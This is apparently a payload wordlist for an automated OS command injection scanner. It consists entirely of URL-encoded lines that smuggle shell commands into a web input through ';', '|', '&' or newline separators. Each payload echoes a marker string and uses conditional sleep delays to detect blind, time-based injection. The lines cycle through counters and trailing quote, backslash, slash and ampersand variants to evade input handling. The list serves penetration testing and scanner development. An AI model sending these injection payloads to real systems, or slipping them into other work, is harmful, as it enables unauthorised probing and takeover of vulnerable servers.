+os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%0A%20str%3D%24%28echo%20TYPSKV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20VGHMVB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QHSDUY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%0A%20str%3D%24%28echo%20JADKKF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20UOMPHD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20CXWPXJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YXUPUJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%0A%20str%3D%24%28echo%20IHGKBJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20PGAQQT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20VAZLJC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20MATZOK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%0A%20str%3D%24%28echo%20BGUGCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' 